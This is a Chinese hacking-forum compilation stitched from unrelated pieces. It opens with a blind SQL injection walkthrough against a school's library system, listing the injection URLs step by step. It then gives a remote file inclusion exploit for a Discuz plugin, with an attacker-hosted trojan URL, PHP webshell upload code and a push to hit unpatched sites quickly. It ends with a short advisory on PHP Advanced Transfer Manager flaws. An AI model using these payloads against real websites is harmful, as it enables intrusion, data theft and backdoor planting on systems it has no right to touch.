简单PHP注入演示

学校的一个外聘老师写的程序,图书+学生管理系统，文件名001.php,002.php,003.php......(B名起的)问题出在004.php第多少行我也忘了，
<td width="118" rowspan="4" align="center" valign="middle"><a href="004.php?ts_id=<?php echo $array[ts_id];?>"><img src="./images/<?php echo $array[‘ts_tp‘];?>" width="136" height="181"></a></td><td width="85">书名:</td>
注意这句<a href="004.php?ts_id=<?php echo $array[ts_id];?>">，ts_id没有任何过滤，赤裸裸的等我们虐待，HOO~(虽然我知道数据库的一切信息，但是这里我还是要黑箱测试)
LET‘S GO~
http://localhost/zhd/004.php?ts_id=1 and 1=1 正常
http://localhost/zhd/004.php?ts_id=1 and 1=2 异常
白痴注入
判断数据库：
提交http://localhost/zhd/004.php?ts_id=1/*fenggou
正常返回，说明数据库支持/*注释，什么数据库支持/*呢？MYSQL！
读取用户名：
提交http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=114/*
正常返回，user()是MYSQL的内置函数，用来查看用户，这里是查看个用户名的第一个字符，没错114是ACCSLL中的"r"，我是root连接，所以语句为真(这招贱心教我滴)但是如果用户名是rijnc的话我不是被骗了？所以在提交
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=111/* o
http://localhost/zhd/004.php?ts_id=1 and ord(mid(user(),1,1))=116/* t
但是如果密码是rootrijnc，那我无语…
判断字段数：
提交http://localhost/zhd/004.php?ts_id=1 order by 10/*
失败，说明字段数小于10，一直试到7语句成立，一共是7个字段了，对我们以后的联合查询带来极大方便，有个小技巧，先5，在10，在15，依次一点点缩小范围
联合查询:
知道了字段数直接提交http://localhost/zhd/004.php?ts_id=1 union select 1,2,3,4,5,6,7/*
正常返回，说明支持union，把语句改改，用and 1=2让他显示错误，嘿嘿~~~
提交http://localhost/zhd/004.php?ts_id=1 and 1=2 union select 1,2,3,4,5,6,7/*
PS：话说光这个漏洞《黑客X档案》都说了N遍，呵呵........
既然有人公布了,也有人连利用程序都写好了,那我也就公布吧!消息来源是鬼仔告诉我的,好像是火狐哪个大哥发现的洞,不太清楚了!
　　discuz论坛的许愿池插件在DZ根目录有个wish.php文件,文件第四行:
require $discuz_root.‘./include/discuzcode.func.php‘;
很明显程序没有做任何过滤,一个十足的远程包含漏洞,具体利用方法就很简单了:
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt?
别忘了后面有个问号!xxxx.txt就是我的PHP木马,c99shell不知道为什么,我没成功,也许与操作系统有关,我没仔细去实验了,直接用的安全天使的那PHP后门,不过可以得到一个"webshell",但是用安全天使那PHP后门无法上传我们真正的webshell上去,所以用下面这个文件就可以上传你的WEBSHELL到网站目录,
<?copy($_FILES[MyFile][tmp_name],"C:Inetpubvhostsaidu.combscntink.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
怎么得到网站实际路径呢?很简单,直接打开http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/xxxx.txt ,不要最后那个问号,这时你会发现程序报错了,网站的实际路径也就出来了!修改个文件里的
C:Inetpubvhostsaidu.combs
为当前你要黑的这个网站实际路径;cntink.php是你上传webshell后需要保存的名字,随便你取什么!
　　把上面那文件保存为txt(其他扩展名也可以)上传到你自己的网站,比如我取名为fly.txt,现在再打开
http://www.163.com/wish.php?discuz_root=http://www.flyt.cn/fly.txt?
OK...看见上传对话框了吧,慢慢上传你的webshell吧!上传后的路径就是你在fly.txt中所设置的路径!
　　以上文章纯属乱写,谁利用这方法黑了站遇到麻烦别找我....其实这玩意应该是发布补丁后才能公开的,但又不是官方的插件,而且别人都发了,无所谓了!
PS:要行动的快点,引用群里某X的一句话: baidu google都把discuz inurl：wish.php搜完了 不过漏洞没补
 

信息提供： 安全公告（或线索）提供热线：51cto.editor@gmail.com
漏洞类别： 输入确认漏洞
攻击类型： 远程攻击
发布日期： 2005-09-20
更新日期： 2005-09-20
受影响系统： PHP Advanced Transfer Manager 1.x
安全系统： 无
漏洞报告人： rgod
漏洞描述： Secunia Advisory: SA16867
PHP Advanced Transfer Manager复合漏洞
rgod已经报道了在PHP Advanced Transfer Manager中的一些漏洞和安全问题。恶意攻击者利用漏洞可能泄露系统信息和一些敏感信息，也可能执行交叉脚本攻击。
1.在用来显示文件之前，在"txt.php", "htm.php", "html.php"和"zip.php"中"current_dir" 和 "filename"参数的输入无效。攻击者利用漏洞通过目录障碍攻击泄露恶意文件的内容。
2.攻击者利用漏洞通过直接访问"test.php"脚本可能泄露某些PHP配置设置。
3.在反馈给用户之前，在"txt.php" 中"font", "normalfontcolor" 和"mess[31]"参数的输入无效。当用户浏览受影响的网络时，攻击者利用漏洞执行恶意HTML代码和恶意脚本代码。
在PHP Advanced Transfer Manager 1.30版本中发现漏洞和安全问题，其他版本也可能受到影响。
测试方法： 无
解决方法： 编辑代码确认输入有效，并限制访问"test.php"脚本。
程序下载：http://phpatm.free.fr/archive/phpATM_130.zip